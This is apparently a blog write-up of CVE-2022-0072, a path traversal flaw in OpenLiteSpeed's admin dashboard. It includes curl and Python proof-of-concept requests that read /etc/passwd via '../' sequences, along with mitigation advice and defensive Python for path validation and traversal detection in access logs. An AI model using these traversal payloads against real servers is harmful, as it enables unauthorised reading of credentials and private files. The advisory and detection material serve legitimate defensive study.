OpenLiteSpeed is a popular open-source web server from LiteSpeed Technologies, used by website owners who want high performance with easy management. Unfortunately, between late 2021 and early 2022, a serious vulnerability was discovered in its admin web interface—a Directory Traversal (or Path Traversal) bug tracked as CVE-2022-0072.
In this exclusive, long-read post, we’ll break down exactly what CVE-2022-0072 is, how you can identify it, and how attackers can exploit it to read sensitive files—sometimes including passwords or private keys. We’ll explore affected versions, see some proof-of-concept (PoC) code, and point you at official resources and patches.
What is CVE-2022-0072?
CVE-2022-0072 is a directory traversal vulnerability found in the OpenLiteSpeed server’s web-based admin panel. Simply put, this bug lets an authenticated attacker trick the server into serving files outside the intended directory—meaning they might read secret files like /etc/passwd, website configs, or even backup credentials.
Official Advisory
- LiteSpeed Security Advisory
- NIST CVE Entry
- Github Disclosure and Fixes
How Does the Vulnerability Work?
Here’s the heart of the problem: the admin dashboard lets users interact with various server files through HTTP requests. However, input sent by the user (such as file names or paths) wasn’t properly filtered or “sanitized.” This means users could sneak in ../ (dot-dot-slash) sequences in their file paths—the classic sign of a traversal attack.
For example, a normal dashboard request might look like this:

```http
GET /admin/file?name=log.txt HTTP/1.1
```

An attacker could modify it to:

```http
GET /admin/file?name=../../../../etc/passwd HTTP/1.1
```
If the server is vulnerable, it will happily open /etc/passwd and send it back! This allows attackers to read almost any file on the server, as long as the server process has access to it.
Prerequisites
- Authenticated access to the OpenLiteSpeed admin dashboard (/admin)
Simple Example Using curl
Suppose your OpenLiteSpeed admin dashboard is accessible at https://example.com:7080/admin, and you have a valid session (or basic auth credentials).
To fetch the /etc/passwd file, you’d send:

```bash
curl -k -u 'admin:ADMIN_PASSWORD' \
  "https://example.com:7080/admin/file?name=../../../../etc/passwd"
```
This should return something like:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```
Here’s a simple Python proof of concept:

```python
import requests

# Traversal payload against the admin file endpoint
url = "https://example.com:7080/admin/file?name=../../../../etc/passwd"

# If the dashboard uses basic authentication:
auth = ('admin', 'PASSWORD')

# verify=False because the admin panel usually uses a self-signed certificate
r = requests.get(url, auth=auth, verify=False)
if r.status_code == 200:
    print(r.text)
else:
    print(f"Failed: {r.status_code}")
```
> Note: Replace example.com, username, and password with your own details.
A successful attack means attackers can read:
- User credentials/configs for websites
- Anything the server process can access
Although this bug requires authentication, many admins use weak passwords or leave interfaces exposed to the internet, making brute-force attacks much more effective.
Fixes and Mitigation
- Upgrade immediately: OpenLiteSpeed versions 1.7.16.1 and later are not vulnerable. Download the latest version from here.
- Restrict access: Ensure your admin dashboard is only accessible from trusted IP ranges, via VPN, or localhost.
Official Fix
OpenLiteSpeed Release Log – See release notes for 1.7.16.1.
Github Patch
References
- NIST National Vulnerability Database - CVE-2022-0072
- OpenLiteSpeed Release Notes
- Exploit-DB Entry
- Original Github fix
Summary
CVE-2022-0072 is a critical path traversal bug in OpenLiteSpeed Web Admin that lets authenticated attackers read any OS file. Patching, restricting dashboard access, and using strong passwords are the best defenses. Staying up to date not only blocks this bug but keeps your stack secure.
Need extra help? Review your server’s access logs for unwanted file reads—and always keep your software patched.
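As an added example (not OpenLiteSpeed's code or the advisory's), here is the defender-side view of the bug described above: a path check of the kind the vulnerable handler lacked, plus a scanner that flags traversal attempts against the /admin/file endpoint in access logs. It goes slightly beyond the post by also catching percent-encoded and double-encoded forms of `../`. The log lines are constructed for this example; the endpoint name is taken from the post.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

def resolve_in_base(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path of user_path inside base_dir, or None if the
    decoded, normalised path escapes base_dir. Compare the resolved path with
    the base directory instead of just searching for '..' in the raw input."""
    decoded = unquote(unquote(user_path))            # also undo double encoding
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/")))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None

# Traversal sequence in raw or percent-encoded form: ../  ..%2f  %2e%2e/  ..\
TRAVERSAL_RE = re.compile(r"(\.\.|%2e%2e)(/|\\|%2f|%5c)", re.IGNORECASE)
# Minimal common-log-format parser: client IP, request target and status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_traversal_attempts(log_lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (client_ip, target, status) for /admin/file requests whose target
    contains a traversal sequence, before or after percent-decoding."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or not m.group("target").startswith("/admin/file"):
            continue
        target = m.group("target")
        if TRAVERSAL_RE.search(target) or TRAVERSAL_RE.search(unquote(unquote(target))):
            hits.append((m.group("ip"), target, int(m.group("status"))))
    return hits

# Constructed sample log (not real traffic): one benign read, three traversal attempts
SAMPLE_LOG = """\
10.0.0.5 - admin [27/Oct/2022:20:15:01 +0000] "GET /admin/file?name=log.txt HTTP/1.1" 200 512
10.0.0.9 - admin [27/Oct/2022:20:15:07 +0000] "GET /admin/file?name=../../../../etc/passwd HTTP/1.1" 200 1887
10.0.0.9 - admin [27/Oct/2022:20:15:09 +0000] "GET /admin/file?name=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 403 0
10.0.0.9 - admin [27/Oct/2022:20:15:11 +0000] "GET /admin/file?name=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1887
203.0.113.4 - - [27/Oct/2022:20:16:00 +0000] "GET /index.html?q=../x HTTP/1.1" 200 3000
""".splitlines()

if __name__ == "__main__":
    for ip, target, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip} -> {target} (HTTP {status})")
```

A 200 on a flagged request is the one to investigate first: it means the file was actually served, whereas a 403 shows the request was blocked.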
Timeline
Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:01:00 UTC